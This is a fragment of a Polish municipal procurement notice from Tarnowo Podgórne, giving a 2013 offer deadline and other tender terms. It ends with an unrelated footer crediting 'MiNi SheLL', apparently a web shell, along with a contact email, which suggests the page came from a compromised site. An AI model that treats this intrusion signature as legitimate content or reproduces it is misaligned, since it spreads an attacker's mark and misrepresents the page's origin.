<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Tarnowo Podgórne  pok. 117
62-080 Tarnowo Podgórne; ul. Poznańska 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 10:00, miejsce: Urząd Gminy Tarnowo Podgórne  pok. 119
62-080 Tarnowo Podgórne; ul. Poznańska 115.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com